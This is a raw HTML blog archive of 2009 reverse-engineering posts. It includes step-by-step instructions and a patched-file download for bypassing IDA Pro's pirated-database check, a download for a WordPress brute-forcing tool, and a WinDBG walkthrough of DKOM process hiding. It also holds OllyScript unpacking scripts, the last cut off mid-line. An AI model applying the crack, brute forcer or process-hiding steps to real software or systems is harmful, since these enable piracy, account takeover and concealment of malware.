src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXFx0DJ-caK7Lk3whIAW7skxTrTlgRPjkDUrrcw96dK2n_3oIdjNDRI3yLt25wEyIBq-RCvIw6a4EkKlkqNKqbA3PGSbTI8D4QdeCU7Rp6SmPmSt-fWxi1VZEaFYls5kHrEM_FiZwZQQk/s400/Owned!!.jpg" alt="" id="BLOGGER_PHOTO_ID_5416601247239268210" border="0" /></a>Figure 6: Owned!!!<br /><br /></div><span style="color: rgb(255, 0, 0);">Note:</span><br /><br />It would be a good idea to run the tool in Windows platform although wine environment can be used also but the tool is not stable for some reason (I didn't investigate further in this case ;))<br /><br /><span style="font-size:130%;">Download Link<br /></span><br /><a href="http://www.4shared.com/file/175981151/3f124165/WP_BruteForcer_final.html">http://www.4shared.com/file/175981151/3f124165/WP_BruteForcer_final.html</a><br /><br />~Signing off<br />@x9090<br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com12tag:blogger.com,1999:blog-1022731470813881575.post-75855590972336859282009-09-24T19:44:00.012+08:002010-01-11T21:50:20.161+08:00"Sorry, this database has been created by a pirate version of IDA Pro"<span style="font-weight: bold;"><span style="font-size:130%;"><br />
Patching ida.wll</span></span><br />
<br />
<span style="font-weight: bold;">Target: IDA Pro Version 5.2.0.911 & Version 5.5<br />
<br />
</span>Some of you might encounter this error message before when you are trying to open an idb (ida database file) file. This will only happen if the idb is created by a pirated copy of IDA Pro like the screenshot below:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7n5N_tOTyXmPXIL-o7Y9fs4xDoYy0QFck0OdGhpCrsXuIpyCGR0ZNfo9As7OmdAe_HERabpFv4YRWfWWfgNqRYMHDTT9ZD167oiQF-sZNmo9DSFdw5gmefgUai1s2QkwBRVZVe56Mnp8/s1600-h/error_ida.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7n5N_tOTyXmPXIL-o7Y9fs4xDoYy0QFck0OdGhpCrsXuIpyCGR0ZNfo9As7OmdAe_HERabpFv4YRWfWWfgNqRYMHDTT9ZD167oiQF-sZNmo9DSFdw5gmefgUai1s2QkwBRVZVe56Mnp8/s400/error_ida.JPG" alt="" id="BLOGGER_PHOTO_ID_5385000611792267570" border="0" /></a><br />
<script type="text/javascript"><!-- google_ad_client = "pub-9154929752124078"; /* x9090.blogspot.com */ google_ad_slot = "4738578270"; google_ad_width = 728; google_ad_height = 90; //-->
</script>Someone from exetools.com has posted the patch but only limited for those who have registered as a member. Based on the description there, it is not hard to patch the pirated message actually.<br />
<br />
The step is fairly easy:<br />
<br />
<ol><li>Find <span style="font-weight: bold;">ida.wll </span>from your IDA installation directory and load it with IDA</li>
<li>Find text string "<span style="font-weight: bold;">Sorry, this database has been created by a pirate version of IDA Pro</span>" by using <span style="font-weight: bold;">Shift+F12 (Strings tab)</span></li>
<li>Enter to jump to the data section</li>
<li>You should see <span style="font-weight: bold;">aSorryThisDatab</span> attribute which is already defined with the above string</li>
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFaizSi0kDTwKIamBQUllparmxdG7p8wS4ohOF4yEttA9nimlMpsC-d1QbwLkFdOz_2r8swHyYCCCbVU4oA0rUZwoRh_u_BYu4-_5uLOKHSpfcqjqi2oM4rqq9rxUDE506lpqYBdETLBws/s1600-h/aSorryThisDatab.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 279px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFaizSi0kDTwKIamBQUllparmxdG7p8wS4ohOF4yEttA9nimlMpsC-d1QbwLkFdOz_2r8swHyYCCCbVU4oA0rUZwoRh_u_BYu4-_5uLOKHSpfcqjqi2oM4rqq9rxUDE506lpqYBdETLBws/s400/aSorryThisDatab.JPG" alt="" id="BLOGGER_PHOTO_ID_5385003497110578370" border="0" /></a>
<li>Put your cursor to the attribute and press <span style="font-weight: bold;">x (Cross reference)</span> to jump to the code section that uses this data</li>
<li>You should now jump to the code which looks like this:<br />
<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtUJhHUC0NsKwZlb_GpaUXgpC_KdqRArOFYShihw-CZp7h1WCu4FKhfPjniI3LlzavpsEfGuZR7LBuk5MxKlXsluEck-oMari-kbEJKxbbHF-ZV6D-ZmZsbNk1EDPM5SMwXCIV227bfgUy/s1600-h/code_patch1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 279px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtUJhHUC0NsKwZlb_GpaUXgpC_KdqRArOFYShihw-CZp7h1WCu4FKhfPjniI3LlzavpsEfGuZR7LBuk5MxKlXsluEck-oMari-kbEJKxbbHF-ZV6D-ZmZsbNk1EDPM5SMwXCIV227bfgUy/s400/code_patch1.JPG" alt="" id="BLOGGER_PHOTO_ID_5385005019488227730" border="0" /></a><br />
</li>
<li>Notice the <span style="font-weight: bold;">jz </span>before the "<span style="font-weight: bold;">call sub_10039660</span>", double click to enter <span style="font-weight: bold;">sub_10039660 </span>function</li>
<li>You can see the 3 exported functions <span style="font-weight: bold;">MD5Init, MD5Update </span>and <span style="font-weight: bold;">MD5Final</span>.</li>
<li>Go to the part where it nears the <span style="font-weight: bold;">retn</span> instruction.</li>
<li>And take note how <span style="font-weight: bold;">EAX </span>is updated because this register will determine if the hash is equal or not and return to the previous function that will do the comparison, "<span style="font-weight: bold;">test al, al</span>"</li>
<li>From the figure above, we know that we can avoid the pirated message if <span style="font-weight: bold;">EAX is zero</span>. So we can patch "<span style="font-weight: bold;">mov al,1</span>" to something that will give us <span style="font-weight: bold;">EAX=0</span>, eg: "<span style="font-weight: bold;">xor eax, eax</span>" ;)</li>
<li>Using any hex editor that you prefer, and jump to this address and do the modification. Done!!!</li>
</ol><br />
<span style="font-weight: bold;">Download: </span><a href="http://www.4shared.com/file/135059142/216192f2/idawll.html">ida.wll.patched</a><span style="font-weight: bold;"><br />
</span><span><br />
<span style="font-weight: bold;"><span style="font-weight: bold;"></span></span></span><span style="font-weight: bold;"><br />
<span style="font-size:130%;">Reference</span><br />
<br />
</span><span style="font-style: italic;">Datarescue IDA pirated .idb database</span> -- <a href="http://forum.exetools.com/showthread.php?t=12087">http://forum.exetools.com/showthread.php?t=12087</a><span style="font-weight: bold;"><br />
</span><br />
~Signing off<br />
@x9090<br />
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-30675764044954259402009-09-14T21:32:00.007+08:002009-09-14T21:48:07.958+08:00Ollyscript Tutorial - Unpack ASPack<script type="text/javascript"><!-- google_ad_client = "pub-9154929752124078"; /* x9090.blogspot.com */ google_ad_slot = "4738578270"; google_ad_width = 728; google_ad_height = 90; //--><br /></script>ASPack is actually similar to UPX.<br /><br />Using PEiD: <span style="font-weight: bold;">ASPack 2.12 -> Alexey Solodovnikov</span><br /><br />The script<br />-----------<br /><br /><blockquote style="font-family:times new roman;">var hwBP <span style="color: rgb(51, 51, 255);"> // Local var for hwBP</span><br /><br />mov hwBP, esp <span style="color: rgb(51, 51, 255);">// Using esp trick</span><br /><br />bphws hwBP, "r" <span style="color: rgb(51, 51, 255);">// Set hardware breakpoint</span><br /><br />run <span style="color: rgb(51, 51, 255);">// Run</span><br /><br />rtr <span style="color: rgb(51, 51, 255);"> // Execute till return</span><br /><br />sto <span style="color: rgb(51, 51, 255);">// F8<br /><br /></span>msg "OEP found"<br /><br />cmt eip, "<<<<<oep>>>>>"<br /><br />ret</oep></blockquote><br /><span style="font-weight: bold;">Download</span>: <a href="http://www.4shared.com/file/132551325/ba05f36b/notepad.html">Notepad.exe packed with ASPack</a><br /><br />Signing off<br />~x9090<br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-62310432069128560912009-09-10T08:53:00.014+08:002009-09-29T23:42:02.815+08:00[DOC] Understanding DKOM with WinDBG<script type="text/javascript"><!-- google_ad_client = "pub-9154929752124078"; /* x9090.blogspot.com */ google_ad_slot = "4738578270"; google_ad_width = 728; google_ad_height = 90; //--></script>Process hiding can be achieved by using a technique called<span style="font-style: italic;"> DKOM </span>(<span style="font-style: italic;">Direct Kernel Object Manipulation</span>). I started to discover this when I first read the book <span style="font-weight: bold;">Rootkit: Subverting the Windows Kernel. </span><br /><br /><br /><span style="font-weight: bold;font-size:130%;" >WinDBG</span><br /><br />Using Task Manager (<span style="font-weight: bold;">Ctrl + Alt + Del</span>) and we see the list of processes:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix-qgi5wFlNuKSHawNPdUG1kNONPlbIdlDnp4IjTiAXp6w4gAIWqfgBJafH9UDZMJcUFFEgBIq_q8NYuFU1stltPHNKCIAw4eRIozq02OFET0nlLA5l3SsNmjDbvce8gBAl5Efic8ambQT/s1600-h/Before.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 193px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix-qgi5wFlNuKSHawNPdUG1kNONPlbIdlDnp4IjTiAXp6w4gAIWqfgBJafH9UDZMJcUFFEgBIq_q8NYuFU1stltPHNKCIAw4eRIozq02OFET0nlLA5l3SsNmjDbvce8gBAl5Efic8ambQT/s400/Before.jpg" alt="" id="BLOGGER_PHOTO_ID_5379641901453878898" border="0" /></a><br />We can find the chain of active processes by looking at the global kernel variable which is not exported by the kernel and undocumented <b>PsActiveProcessHead.<br /><br /></b><b>PsActiveProcessHead</b> contains a linked list <b>LIST_ENTRY </b>for the current active processes being processed by the kernel.<br /><br />The "<b>system</b>"<b> </b>process is always in the <span style="font-weight: bold;">FIRST ENTRY</span> which can be found by calling kernel API <a href="http://msdn.microsoft.com/en-us/library/bb314008.aspx"><b>PsInitialSystemProcess</b></a>. The function will return a pointer to the <b>EPROCESS </b>structure of "<b>system</b>" process. The <b>EPROCESS.ActiveProcessLinks.Blink </b>is the <b>PsActiveProcessHead</b>. To verify that:<br /><br />Let's see the <b>EPROCESS </b>and <b>LIST_ENTRY</b> structure<br /><br /><span style="font-family:times new roman;">kd> dt _eprocess</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><br /><blockquote style="font-family:times new roman;"> <span style="color: rgb(255, 255, 51);">+0x000 Pcb : _KPROCESS</span><br /><span style="color: rgb(255, 255, 51);"> +0x06c ProcessLock : _EX_PUSH_LOCK</span><br /><span style="color: rgb(255, 255, 51);"> +0x070 CreateTime : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x078 ExitTime : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x080 RundownProtect : _EX_RUNDOWN_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x084 UniqueProcessId : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> </span><b style="color: rgb(255, 255, 51);">+0x088 ActiveProcessLinks : _LIST_ENTRY</b><br /><span style="color: rgb(255, 255, 51);"> +0x090 QuotaUsage : [3] Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x09c QuotaPeak : [3] Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0a8 CommitCharge : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0ac PeakVirtualSize : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0b0 VirtualSize : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0b4 SessionProcessLinks : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x0bc DebugPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c0 ExceptionPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c4 ObjectTable : Ptr32 _HANDLE_TABLE</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c8 Token : _EX_FAST_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x0cc WorkingSetLock : _FAST_MUTEX</span><br /><span style="color: rgb(255, 255, 51);"> +0x0ec WorkingSetPage : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0f0 AddressCreationLock : _FAST_MUTEX</span><br /><span style="color: rgb(255, 255, 51);"> +0x110 HyperSpaceLock : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x114 ForkInProgress : Ptr32 _ETHREAD</span><br /><span style="color: rgb(255, 255, 51);"> +0x118 HardwareTrigger : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x11c VadRoot : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x120 VadHint : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x124 CloneRoot : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x128 NumberOfPrivatePages : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x12c NumberOfLockedPages : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x130 Win32Process : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x134 Job : Ptr32 _EJOB</span><br /><span style="color: rgb(255, 255, 51);"> +0x138 SectionObject : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x13c SectionBaseAddress : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x140 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK</span><br /><span style="color: rgb(255, 255, 51);"> +0x144 WorkingSetWatch : Ptr32 _PAGEFAULT_HISTORY</span><br /><span style="color: rgb(255, 255, 51);"> +0x148 Win32WindowStation : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x14c InheritedFromUniqueProcessId : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x150 LdtInformation : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x154 VadFreeHint : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x158 VdmObjects : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x15c DeviceMap : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x160 PhysicalVadList : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x168 PageDirectoryPte : _HARDWARE_PTE_X86</span><br /><span style="color: rgb(255, 255, 51);"> +0x168 Filler : Uint8B</span><br /><span style="color: rgb(255, 255, 51);"> +0x170 Session : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x174 ImageFileName : [16] UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x184 JobLinks : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x18c LockedPagesList : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x190 ThreadListHead : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x198 SecurityPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x19c PaeTop : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a0 ActiveThreads : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a4 GrantedAccess : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a8 DefaultHardErrorProcessing : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1ac LastThreadExitStatus : Int4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b0 Peb : Ptr32 _PEB</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b4 PrefetchTrace : _EX_FAST_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b8 ReadOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1c0 WriteOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1c8 OtherOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1d0 ReadTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1d8 WriteTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1e0 OtherTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1e8 CommitChargeLimit : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1ec CommitChargePeak : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1f0 AweInfo : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO</span><br /><span style="color: rgb(255, 255, 51);"> +0x1f8 Vm : _MMSUPPORT</span><br /><span style="color: rgb(255, 255, 51);"> +0x238 LastFaultCount : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x23c ModifiedPageCount : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x240 NumberOfVads : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x244 JobStatus : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Flags : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 CreateReported : Pos 0, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 NoDebugInherit : Pos 1, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessExiting : Pos 2, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessDelete : Pos 3, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Wow64SplitPages : Pos 4, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VmDeleted : Pos 5, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 OutswapEnabled : Pos 6, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Outswapped : Pos 7, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ForkFailed : Pos 8, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 HasPhysicalVad : Pos 9, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 AddressSpaceInitialized : Pos 10, 2 Bits</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 SetTimerResolution : Pos 12, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 BreakOnTermination : Pos 13, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 SessionCreationUnderway : Pos 14, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 WriteWatch : Pos 15, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessInSession : Pos 16, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 OverrideAddressSpace : Pos 17, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 HasAddressSpace : Pos 18, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 LaunchPrefetched : Pos 19, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 InjectInpageErrors : Pos 20, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VmTopDown : Pos 21, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused3 : Pos 22, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused4 : Pos 23, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VdmAllowed : Pos 24, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused : Pos 25, 5 Bits</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused1 : Pos 30, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused2 : Pos 31, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x24c ExitStatus : Int4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x250 NextPageColor : Uint2B</span><br /><span style="color: rgb(255, 255, 51);"> +0x252 SubSystemMinorVersion : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x253 SubSystemMajorVersion : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x252 SubSystemVersion : Uint2B</span><br /><span style="color: rgb(255, 255, 51);"> +0x254 PriorityClass : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x255 WorkingSetAcquiredUnsafe : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x258 Cookie : Uint4B</span><br /><br /><span style="color: rgb(255, 0, 0);font-family:Times New Roman;font-size:85%;" >You</span><span style="color: rgb(255, 0, 0);"> can also check the structure on this page: <a href="http://www.acc.umu.se/%7Ebosse/ntifs.h">http://www.acc.umu.se/~bosse/ntifs.h</a></span></blockquote><span style="font-family:times new roman;">kd> dt _list_entry</span><br /><span style="font-family:times new roman;">ntdll!_LIST_ENTRY<br /></span><blockquote style="font-family: times new roman; color: rgb(255, 255, 51);"><br />+0x000 Flink : Ptr32 _LIST_ENTRY<br />+0x004 Blink : Ptr32 _LIST_ENTRY</blockquote><br />We first start to verify <span style="font-weight: bold;">PsActiveProcessHead </span>by checking the linked list:<br /><br /><span style="font-family:times new roman;">kd> dl nt!psactiveprocesshead 100 2</span><br /><br /><b></b><blockquote style="font-family: times new roman; color: rgb(255, 255, 51);"><b>Addr Flink Blink</b><br /><br /><b>805627b8 </b>825c68b8 82499c68<br />825c68b8 821f2818 <b>805627b8</b><br />821f2818 8211b680 825c68b8<br />8211b680 8229fe28 821f2818<br />8229fe28 820bde28 8211b680<br />820bde28 8220fe28 8229fe28<br />8220fe28 82290910 820bde28<br />82290910 821c90a8 8220fe28<br />821c90a8 8223e3a0 82290910<br />8223e3a0 82102c98 821c90a8<br />82102c98 8216b3a0 8223e3a0<br />8216b3a0 820f8680 82102c98<br />820f8680 82176aa8 8216b3a0<br />82176aa8 821611b8 820f8680<br />821611b8 8221ce28 82176aa8<br />8221ce28 8218f5b0 821611b8<br />8218f5b0 822484e8 8221ce28<br />822484e8 82252aa8 8218f5b0<br />82252aa8 821fb258 822484e8<br />821fb258 82147770 82252aa8<br />82147770 821cfc40 821fb258<br />821cfc40 8218daa8 82147770<br />8218daa8 820f7538 821cfc40<br />820f7538 822153a0 8218daa8<br />822153a0 8211fe28 820f7538<br />8211fe28 825cb908 822153a0<br />825cb908 82128e28 8211fe28<br />82128e28 820f3510 825cb908<br />820f3510 8210ce28 82128e28<br />8210ce28 820fd7c8 820f3510<br />820fd7c8 82234630 8210ce28<br />82234630 821da510 820fd7c8<br />821da510 821a9658 82234630<br />821a9658 82143c40 821da510<br />82143c40 822a80a8 821a9658<br />822a80a8 8230b0a8 82143c40<br />8230b0a8 8231d2d8 822a80a8<br />8231d2d8 821f4b20 8230b0a8<br />821f4b20 82499c68 8231d2d8<br />82499c68 805627b8 821f4b20<br /></blockquote><br /><br />We can then use Kernel API <a href="http://msdn.microsoft.com/en-us/library/bb314008.aspx"><b>PsInitialSystemProcess</b></a> to look for the address of <span style="font-weight: bold;">PsActiveProcessHead </span>which should be <b>0x805627b8 </b><br /><br /><span style="font-family:times new roman;">kd> dt _eprocess activeprocesslinks.blink poi(psinitialsystemprocess)</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><span style="font-family:times new roman;"></span><blockquote style="color: rgb(255, 255, 51);"><span style="font-family:times new roman;"> +0x088 ActiveProcessLinks : [ 0x821f2818 - 0x805627b8 ]</span><br /><span style="font-family:times new roman;"> +0x004 Blink : </span><b style="font-family: times new roman;">0x805627b8 </b><span style="font-family:times new roman;">_LIST_ENTRY [ </span><i style="font-family: times new roman;">0x825c68b8 </i><span style="font-family:times new roman;">- </span><i style="font-family: times new roman;">0x82499c68 </i><span style="font-family:times new roman;">]<br /></span></blockquote><span style="font-family:times new roman;"></span><br />We prove that <b>0x805627b8 </b>is the address of <b><span style="font-weight: bold;"></span>PsActiveProcessHead </b>that contains linked list of <b>ActiveProcessLinks </b>[<b>Flink & Blink</b>]<b> </b>for <b>"system" </b>process [<b>Flink=0x825c68b8, Blink=0x82499c68</b>] process, in order to verify that:<br /><br /><br />We take <b>"system" </b>process <b>Flink </b>address <i>0x825c68b8</i>-0x88 in order to get its <b>EPROCESS </b>structure (please refer to "dt _eprocess" and check the offset of <b>ActiveProcessLinks=Flink</b>):<br /><br /><span style="font-family:times new roman;">kd> dt _eprocess 0x825c68b8-0x88</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><br /><blockquote style="color: rgb(255, 255, 51);"> +0x000 Pcb : _KPROCESS<br />+0x06c ProcessLock : _EX_PUSH_LOCK<br />+0x070 CreateTime : _LARGE_INTEGER 0x0<br />+0x078 ExitTime : _LARGE_INTEGER 0x0<br />+0x080 RundownProtect : _EX_RUNDOWN_REF<br /><b>+0x084 UniqueProcessId : 0x00000004<br />+0x088 ActiveProcessLinks : _LIST_ENTRY [ 0x821f2818 - 0x805627b8 ]</b><br />...<br /><b>+0x174 ImageFileName : [16] "System"<br /></b> ... </blockquote>The <span style="font-weight: bold;">ImageFileName </span>gives us the process name which is "<span style="font-weight: bold;">system</span>" and the "<span style="font-weight: bold;">system</span>" process always has the process id 4 (<span style="font-weight: bold;">UniqueProcessId: 0x00000004</span>)<br /><br /><br /><span style="font-weight: bold;"><span style="font-style: italic;"><span style="font-size:130%;"><span style="font-family:arial;">Hiding Processes</span></span><br /><br /></span></span>So we know that <b> [ 0x821f2818 - 0x805627b8 ] </b>is the start of the active process chain. In order to hide the processes, we can remove the <b>EPROCESS </b>structure from this chain. For simplicity, I'll "remove" all the chains that's mean hiding all the processes:<br /><br /><br /><span style="font-family:times new roman;">kd> ed 805627b8</span> <span style="font-family:times new roman;"><br />805627b8 825c68b8<br /></span><span style="font-family:times new roman;">Input> 805627b8 </span><br /><br />Use <b>ed </b>command to edit the memory address @ <b>0x805627b8 </b>(remember this is <span style="font-weight: bold;">PsActiveProcessHead </span>and it is always start with "<span style="font-weight: bold;">system</span>" process) and the debugger is waiting for your input. So just edit the address to point back to itself <b>0x805627b8 </b><br /><br />The result would be:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNt3dBae7k4IkDe6h8X5bOlswDtqVSjIPvMl_ypSREoA7ZzyuDlDsmHdWm8gyFNt4fm6WNuC_AMHm2mQGs6gg2CHaYy6zT7VSUZIdEtYmYBVsaoJp_N_nWNygawqkIeNvChqZgjYSQGdw/s1600-h/After.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 195px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNt3dBae7k4IkDe6h8X5bOlswDtqVSjIPvMl_ypSREoA7ZzyuDlDsmHdWm8gyFNt4fm6WNuC_AMHm2mQGs6gg2CHaYy6zT7VSUZIdEtYmYBVsaoJp_N_nWNygawqkIeNvChqZgjYSQGdw/s400/After.jpg" alt="" id="BLOGGER_PHOTO_ID_5379650843866723090" border="0" /></a><br /><br /><span style="font-weight: bold;"><span style="font-size:130%;"><span style="font-family:arial;">References:<br /><span style="font-size:100%;"><br /></span></span></span></span><span style="font-weight: bold;"><span style="font-size:130%;"><span style="font-family:arial;"><span style="font-size:100%;"><span style="font-weight: bold; font-style: italic;">Rootkit: Subverting the Windows Kernel (Page 169) - Direct Kernel Object Manipulation</span></span></span></span></span><br /><span style="font-size:100%;"><a href="http://www.rootkit.com/vault/Opc0de/GetVarXP.pdf">http://www.rootkit.com/vault/Opc0de/GetVarXP.pdf</a> - <b>Finding Kernel Global Variables</b></span><span style="font-weight: bold;"><span style="font-size:130%;"><span style="font-family:arial;"><span style="font-size:100%;"><span style="font-weight: bold;"></span><span style="font-weight: bold; font-style: italic;"><br /></span></span></span></span></span><a href="http://www.xfocus.net/articles/200408/724.html">http://www.xfocus.net/articles/200408/724.html</a> - <b>获取Windows 系统的内核变量</b><br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-22395014836109003012009-07-22T21:20:00.006+08:002009-07-22T21:51:11.751+08:00Ollyscript Tutorial - Unpack UPXThis is the simplest Ollyscript tutorial to demonstrate how to write Ollydbg script.<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">var hwdBP </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" > // Local variable to store hardware breakpoint</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">var softBP </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Local variable to strore software breakpoint</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">sti </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Step into F7 command</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">findop eip, #61# </span></span><span style="color: rgb(0, 0, 